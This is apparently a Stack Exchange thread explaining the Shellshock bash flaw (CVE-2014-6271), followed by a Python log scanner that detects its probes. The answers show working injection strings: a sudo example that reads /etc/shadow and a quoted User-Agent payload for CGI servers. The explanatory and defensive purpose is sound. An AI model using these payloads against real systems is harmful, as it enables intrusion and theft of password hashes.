
I am trying to understand what the security concern of CVE-2014-6271 could be, and all the links I see just give me the command below.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If I get the output as,

vulnerable
this is a test

it means my bash shell is vulnerable.

But in what way is it related to security? In other words, what harm could be done to my system?

Deer Hunter
Ramesh
  • Related: http://unix.stackexchange.com/questions/157381/are-any-other-versions-of-bash-vulnerable-to-shellshock-cve-2014-6271-beside – jippie Sep 25 '14 at 05:13

3 Answers

The security concern is that if bash is launched with a malicious environment variable set, that bash will execute the code in the variable.

For example, let's say you have a web server that calls /bin/foo bar. Let's say this foo application also uses an environment variable called baz, and the value of this variable comes from input provided by the user. So the web server application sets the environment, and then shells out to foo bar. Well, when bash reads the environment variables, if that provided variable has malicious code, bash is going to run it.

Normally this is not a concern. Environment variables are supposed to be completely safe. If the application using that variable misbehaves, that is another matter. But bash does not use the baz variable in the situation above.

For example:

testscript.sh

export BAZ='() { :;}; echo MALICIOUS CODE'
echo starting sleep
/bin/bash -c 'sleep 1'

When running it, we get the following:

$ /bin/dash testscript.sh
starting sleep
MALICIOUS CODE

So simply from having that variable set, we can get bash to run arbitrary code.


Here's another example that uses no explicit shell, and makes no mention of bash:

$ perl -e '$ENV{"BAZ"}="() { :;}; echo MALICIOUS CODE"; print("starting sleep\n"); system("/bin/sleep 1;");'
starting sleep
MALICIOUS CODE

(for this to work, /bin/sh needs to be bash)

phemmer

It works via sudo as well if env_reset is disabled (it's enabled by default in Debian, at least):

Defaults env_reset

but if one changes it to

Defaults !env_reset (seen this on several systems in the past!!!)

then

sudo Y='() { disabled; }; /bin/cat /etc/shadow;' /tmp/zomg.sh

root:$6$......
seg fault goes here

The sudoers file contains:

alinh ALL=/tmp/zomg.sh

alinh

These guys explain how you can inject code into the web server CGI process. It basically works by setting the User-Agent of a request in such a way that it contains the exploit code:

http://packetstormsecurity.com/files/128394/bash-poc.txt

'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'

When that attack succeeds, you can gain access to the web server with web server privileges, and its entire content is to be regarded as compromised.

jippie
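Detection side of the CGI vector described in this answer, as an added example that is not from the original post or the linked PoC: a small Python scanner that parses Apache combined-format access log lines and flags any request field carrying the bash function-definition prefix (`() {`) that Shellshock probes rely on. The sample log lines are constructed, not real traffic, and the log regex, pattern and function names are my own assumptions; the pattern is deliberately looser than bash's own literal `() {` check so that spacing variants are also caught.

```python
import re

# Constructed Apache "combined" log lines (assumed format; not real traffic).
# Lines 2 and 3 carry a function-definition prefix in User-Agent / Referer,
# which a CGI server would export into the environment of the handler.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.11 - - [25/Sep/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
192.0.2.12 - - [25/Sep/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :; }; echo x" "curl/7.37.0"
192.0.2.13 - - [25/Sep/2014:10:02:00 +0000] "POST /cgi-bin/form HTTP/1.1" 302 0 "http://example.org/" "Wget/1.15"
"""

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Vulnerable bash only acted on values starting with the literal "() {";
# allow optional whitespace so reformatted probes are not missed.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Header-derived fields that CGI (RFC 3875) exports as HTTP_* env variables.
SCANNED_FIELDS = ("agent", "referer", "request")


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(log_text):
    """Scan log text and return one hit per line whose fields match the prefix."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue  # unparsable line: skip rather than silently guess
        for field in SCANNED_FIELDS:
            if SHELLSHOCK_RE.search(entry[field]):
                hits.append({"line": lineno, "ip": entry["ip"],
                             "field": field, "value": entry[field]})
                break  # one report per request is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} via {hit['field']}: {hit['value']!r}")
```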